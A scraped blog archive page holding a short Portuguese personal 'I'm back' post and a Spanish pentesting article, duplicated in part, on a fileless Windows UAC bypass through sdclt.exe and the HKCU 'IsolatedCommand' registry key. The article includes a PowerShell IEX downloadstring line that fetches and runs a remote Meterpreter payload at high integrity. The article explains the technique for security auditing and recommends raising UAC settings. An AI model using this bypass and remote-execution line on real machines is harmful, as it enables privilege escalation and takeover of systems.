Showing posts with label vez. Show all posts
Showing posts with label vez. Show all posts
Tuesday, September 12, 2017
Voltei Deve ser a 3 vez que falo que voltei mas foda se
Voltei Deve ser a 3 vez que falo que voltei mas foda se
Ent����o galera,voltei,maaaaaaaaas pra quem n�o me conhece ainda,colocarei minhas informa�oes abaixo
Nome:Celso Rodrigues Junior
Idade:12
Data de nascimento:03/03/2000
Altura:1,80(� verdade n�o to mentindo n�o carai)
Peso:67 Kg(Sou meio pesadinho tambem mas foda-se)
Ent�o esse cara sou eu,e vamo ver se dessa vez eu fa�o alguma coisa no blog ou se vou ficar parad�o igual alguma coisa que fique parado e eu to com pregui�a de pensar no que,bem esse sou eu e to de vorta povooooooo.
download file now
Monday, September 11, 2017
Fileless 2 Un nuevo sí uno más otra vez bypass UAC para Windows
Fileless 2 Un nuevo sí uno más otra vez bypass UAC para Windows
Hace unos meses Enigma0x3 publicaba un Bypass UAC distinto a los conocidos hasta el momento, se trataba de un bypass UAC Fileless, es decir, sin necesidad de subir una DLL o un binario al equipo para explotar o aprovecharse de la debilidad. En este caso, se manipulaban unos hives del registro y se lograba obtener ejecuci�n de c�digo en un contexto de integridad alto. Incluso, en su d�a, nos adelantamos siendo los primeros en migrar a Metasploit el c�digo del bypass UAC Fileless de Enigma0x3.
La batalla sigue su curso y siguen apareciendo bypasses de UAC, tal y como podemos ver casi semanalmente en UACMe. Incluso, nosotros tenemos nuestra versi�n del bypass de UAC con el DLL Hijacking con Wusa y aprovech�ndonos de CompMgmtLauncher.exe. Lo importante es ver c�mo muchas t�cnicas se repiten o el proceso para realizar b�squedas de debilidades en esta feature de Microsoft es muy parecida en muchos casos y entender las bases de todo esto.
Figura 2: V�deo con PoC de UAC Bypass usando CompMgmtLauncher en Windows 7/8/8.1
Hace un par de semanas os contaba c�mo hacer un bypass de UAC aprovech�ndonos de los AppPaths. Este bypass tambi�n fue descubierto por Enigma0x3. Hoy hablaremos de nuevo de este bypass y como conseguir que, gracias a ello, podamos obtener una nueva versi�n de bypass UAC Fileless.
Manos a la obra: En busca del Bypass UAC
Ya vimos que los binarios firmados por Microsoft que son auto-elevados pueden traer debilidades debido a la pol�tica de UAC, por ello se recomienda cambiarla a �Notificar siempre�. En el bypass de los AppPaths, el binario encontrado que proporcionaba el �xito era el binario sdclt.exe.
Cuando se analiz� los argumentos con los que se ejecuta sdclt.exe se pudo observar que existen varios y que alguno podr�a ser interesante. Enigma0x3 se dio cuenta de que cuando se invoca sdclt.exe se comprueba si el argumento coincide con �/kickoffelev�, si esto es as� se establece la ruta completa para sdclt.exe y se agrega �/kickoffjob� como par�metro y se invoca a SxShellExecuteWithElevate. Esto hace que se inicie �%systemroot%System32sdclt.exe /kickoffjob� con el verbo �runas�. En otras palabras, es una forma pragm�tica de ejecutar la opci�n �RunAsAdministrator� cuando se hace clic con el bot�n secundario.
Si echamos un ojo a la ejecuci�n de sdclt.exe /Kickoffelev con nuestro procmon podremos observar que en la rama HKCU del registro de Windows nos encontramos �Shell[verbo]command� d�nde se podr� escribir cualquier cosa. En el caso del [verbo], ser� �runas� lo que nos encontraremos. En esta clave que no se encuentra podremos poner una llamada a un binario con par�metros, lo cual es muy interesante para lograr el bypass de UAC y ejecutar nuestro c�digo.
Cuando se a�ade la clave por defecto en la ruta del registro HKCU SoftwateClassesexefileshell unascommand no se obtiene nada. Volviendo a ejecutar Procmon con esa ruta creada vemos que nos aparece una nueva clave no encontrada denominada IsolatedCommand. Ahora s�, en el momento que creemos esa clave y le demos un valor podremos ejecutar c�digo en un contexto de integridad alta.
Si lanzamos el binario sdclt.exe /kickoffevel aparecer� una cmd.exe, tal y como se puede ver en la siguiente imagen. Se puede ver como se crea un fichero en c: y luego se borra, por lo que se est� ejecutando el cmd.exe en un proceso de integridad alta o con privilegio.
Si modificamos el valor de la entrada por la ejecuci�n de una Powershell que ejecute la instrucci�n:
Y como lo mejor es verlo funcionando, en este v�deo de menos de dos minutos y medio, os dejo una demostraci�n paso a paso de lo que os he explicado en el art�culo.
Como se puede ver, es una nueva forma, muy similar, de realizar Fileless en un bypass de UAC. Microsoft poco a poco va parcheando este tipo de situaciones, aunque no lo consideren vulnerabilidades, y t�, por si acaso, deber�as subir el nivel de seguridad de UAC. En resumen, una nueva forma para utilizar en una auditor�a interna de sistemas.
Autor: Pablo Gonz�lez P�rez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y �Pentesting con Powershell�, Microsoft MVP en Seguridad y Security Researcher en ElevenPaths
 |
| Figura 1: Fileless II. Un nuevo (s�, uno m�s otra vez) Bypass UAC para Windows |
La batalla sigue su curso y siguen apareciendo bypasses de UAC, tal y como podemos ver casi semanalmente en UACMe. Incluso, nosotros tenemos nuestra versi�n del bypass de UAC con el DLL Hijacking con Wusa y aprovech�ndonos de CompMgmtLauncher.exe. Lo importante es ver c�mo muchas t�cnicas se repiten o el proceso para realizar b�squedas de debilidades en esta feature de Microsoft es muy parecida en muchos casos y entender las bases de todo esto.
Figura 2: V�deo con PoC de UAC Bypass usando CompMgmtLauncher en Windows 7/8/8.1
Hace un par de semanas os contaba c�mo hacer un bypass de UAC aprovech�ndonos de los AppPaths. Este bypass tambi�n fue descubierto por Enigma0x3. Hoy hablaremos de nuevo de este bypass y como conseguir que, gracias a ello, podamos obtener una nueva versi�n de bypass UAC Fileless.
Manos a la obra: En busca del Bypass UAC
Ya vimos que los binarios firmados por Microsoft que son auto-elevados pueden traer debilidades debido a la pol�tica de UAC, por ello se recomienda cambiarla a �Notificar siempre�. En el bypass de los AppPaths, el binario encontrado que proporcionaba el �xito era el binario sdclt.exe.
 |
| Figura 3: Configuraci�n segura en Modo Windows "Vista" |
Cuando se analiz� los argumentos con los que se ejecuta sdclt.exe se pudo observar que existen varios y que alguno podr�a ser interesante. Enigma0x3 se dio cuenta de que cuando se invoca sdclt.exe se comprueba si el argumento coincide con �/kickoffelev�, si esto es as� se establece la ruta completa para sdclt.exe y se agrega �/kickoffjob� como par�metro y se invoca a SxShellExecuteWithElevate. Esto hace que se inicie �%systemroot%System32sdclt.exe /kickoffjob� con el verbo �runas�. En otras palabras, es una forma pragm�tica de ejecutar la opci�n �RunAsAdministrator� cuando se hace clic con el bot�n secundario.
 |
| Figura 4: invocaci�n de ejecuci�n |
Si echamos un ojo a la ejecuci�n de sdclt.exe /Kickoffelev con nuestro procmon podremos observar que en la rama HKCU del registro de Windows nos encontramos �Shell[verbo]command� d�nde se podr� escribir cualquier cosa. En el caso del [verbo], ser� �runas� lo que nos encontraremos. En esta clave que no se encuentra podremos poner una llamada a un binario con par�metros, lo cual es muy interesante para lograr el bypass de UAC y ejecutar nuestro c�digo.
 |
| Figura 5: Clave NOT FOUND |
Cuando se a�ade la clave por defecto en la ruta del registro HKCU SoftwateClassesexefileshell unascommand no se obtiene nada. Volviendo a ejecutar Procmon con esa ruta creada vemos que nos aparece una nueva clave no encontrada denominada IsolatedCommand. Ahora s�, en el momento que creemos esa clave y le demos un valor podremos ejecutar c�digo en un contexto de integridad alta.
 |
| Figura 6: Clave del Registro con direcci�n de shell |
Si lanzamos el binario sdclt.exe /kickoffevel aparecer� una cmd.exe, tal y como se puede ver en la siguiente imagen. Se puede ver como se crea un fichero en c: y luego se borra, por lo que se est� ejecutando el cmd.exe en un proceso de integridad alta o con privilegio.
 |
| Figura 7: Shell ejecutada |
Si modificamos el valor de la entrada por la ejecuci�n de una Powershell que ejecute la instrucci�n:
IEX (new-object net.webclient).downloadstring(�[ruta http de Meterpreter]�)...podr�amos encontrar la posibilidad de ejecutar nuestro c�digo de forma remota en un contexto de integridad alto y sin necesidad de subir un binario o una DLL.
 |
| Figura 8: Ruta de ejecuci�n PowerShell |
Y como lo mejor es verlo funcionando, en este v�deo de menos de dos minutos y medio, os dejo una demostraci�n paso a paso de lo que os he explicado en el art�culo.
Figura 9: PoC de Fileless 2 para hacer Bypass de UAC en Windows
Como se puede ver, es una nueva forma, muy similar, de realizar Fileless en un bypass de UAC. Microsoft poco a poco va parcheando este tipo de situaciones, aunque no lo consideren vulnerabilidades, y t�, por si acaso, deber�as subir el nivel de seguridad de UAC. En resumen, una nueva forma para utilizar en una auditor�a interna de sistemas.
Autor: Pablo Gonz�lez P�rez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y �Pentesting con Powershell�, Microsoft MVP en Seguridad y Security Researcher en ElevenPaths
Sigue Un inform�tico en el lado del mal - Google+ RSS 0xWord
download file now
Subscribe to:
Posts (Atom)